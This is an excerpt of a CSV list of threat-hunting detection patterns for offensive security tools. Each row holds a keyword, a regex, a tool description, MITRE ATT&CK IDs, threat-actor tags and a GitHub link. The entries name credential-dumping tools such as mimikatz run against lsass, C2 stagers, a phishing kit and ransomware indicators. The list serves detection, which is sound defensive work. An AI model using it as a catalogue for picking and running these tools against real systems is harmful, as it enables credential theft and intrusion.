"*KioqUkFOU09NIE5PVEUqKgoKWW91ciBmaWxlcyBoYXZlIGJlZW4gZW5jcnlwdGVkLgoKQWxsIHlvdXIgaW1wb3J0YW50IGZpbGVzLCBpbmNsdWRpbm*",".{0,1000}KioqUkFOU09NIE5PVEUqKgoKWW91ciBmaWxlcyBoYXZlIGJlZW4gZW5jcnlwdGVkLgoKQWxsIHlvdXIgaW1wb3J0YW50IGZpbGVzLCBpbmNsdWRpbm.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","50483"
"*kiosk.sh*startVNC.sh*",".{0,1000}kiosk\.sh.{0,1000}startVNC\.sh.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50484"
"*KiRBi ticket for mimikatz*",".{0,1000}KiRBi\sticket\sfor\smimikatz.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50485"
"*kirbi.tickets*",".{0,1000}kirbi\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50486"
"*kirbi_to_hashcat.py*",".{0,1000}kirbi_to_hashcat\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","50487"
"*kirbi2john.*",".{0,1000}kirbi2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50488"
"*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50489"
"*kirbi2john.py*",".{0,1000}kirbi2john\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","50490"
"*kirbikator.exe*",".{0,1000}kirbikator\.exe.{0,1000}","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","N/A","10","1463","214","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z","50491"
"*Kirklord1967@tutanota.com*",".{0,1000}Kirklord1967\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50492"
"*kite03/echoac-poc*",".{0,1000}kite03\/echoac\-poc.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","50493"
"*kitrap0d.x86.dll*",".{0,1000}kitrap0d\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50495"
"*kitrap0d_payload*",".{0,1000}kitrap0d_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50496"
"*kitten.dll*",".{0,1000}kitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50497"
"*kitten/basicKitten*",".{0,1000}kitten\/basicKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50498"
"*kitten_test.go*",".{0,1000}kitten_test\.go.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50499"
"*Kittens love cookies too! >:3*",".{0,1000}Kittens\slove\scookies\stoo!\s\>\:3.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","50500"
"*kittens/bananaKitten*",".{0,1000}kittens\/bananaKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50501"
"*Kittielocal -*",".{0,1000}Kittielocal\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50502"
"*KittyStager -*",".{0,1000}KittyStager\s\-.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50503"
"*KittyStager ?*",".{0,1000}KittyStager\s\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50504"
"*KittyStager ??*",".{0,1000}KittyStager\s\?\?.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50505"
"*KittyStager.git*",".{0,1000}KittyStager\.git.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50506"
"*KittyStager/cmd*",".{0,1000}KittyStager\/cmd.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50507"
"*KittyStager/internal*",".{0,1000}KittyStager\/internal.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50508"
"*KittyStager/kitten*",".{0,1000}KittyStager\/kitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","50509"
"*kiwi flavor !*",".{0,1000}kiwi\sflavor\s!.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50510"
"*Kiwi Legit Printer*",".{0,1000}Kiwi\sLegit\sPrinter.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50511"
"*Kiwi Security Support Provider*",".{0,1000}Kiwi\sSecurity\sSupport\sProvider.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50512"
"*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*",".{0,1000}KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50513"
"*kiwi_cmd *",".{0,1000}kiwi_cmd\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50514"
"*kiwi_cmd*/process:lsass.exe*",".{0,1000}kiwi_cmd.{0,1000}\/process\:lsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","50515"
"*KIWI_KERBEROS_BUFFER*",".{0,1000}KIWI_KERBEROS_BUFFER.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50516"
"*KIWI_MSV1_0_PRIMARY_CREDENTIALS KO*",".{0,1000}KIWI_MSV1_0_PRIMARY_CREDENTIALS\sKO.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50517"
"*klezVirus/CheeseTools*",".{0,1000}klezVirus\/CheeseTools.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","50518"
"*klezVirus/inceptor*",".{0,1000}klezVirus\/inceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","50519"
"*klezVirus/SilentMoonwalk*",".{0,1000}klezVirus\/SilentMoonwalk.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","50520"
"*klsecservices/rpivot*",".{0,1000}klsecservices\/rpivot.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","50522"
"*kmahyyg/mremoteng-decrypt*",".{0,1000}kmahyyg\/mremoteng\-decrypt.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","50523"
"*knavesec/CredMaster*",".{0,1000}knavesec\/CredMaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","50525"
"*kncchdigobghenbbaddojjnnaogfppfj*",".{0,1000}kncchdigobghenbbaddojjnnaogfppfj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50526"
"*knight3xppu263m7g4ag3xlit2qxpryjwueobh7vjdc3zrscqlfu3pqd.onion*",".{0,1000}knight3xppu263m7g4ag3xlit2qxpryjwueobh7vjdc3zrscqlfu3pqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50527"
"*known_hosts2john.py*",".{0,1000}known_hosts2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50529"
"*knowsmore --create-db*",".{0,1000}knowsmore\s\-\-create\-db.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","50530"
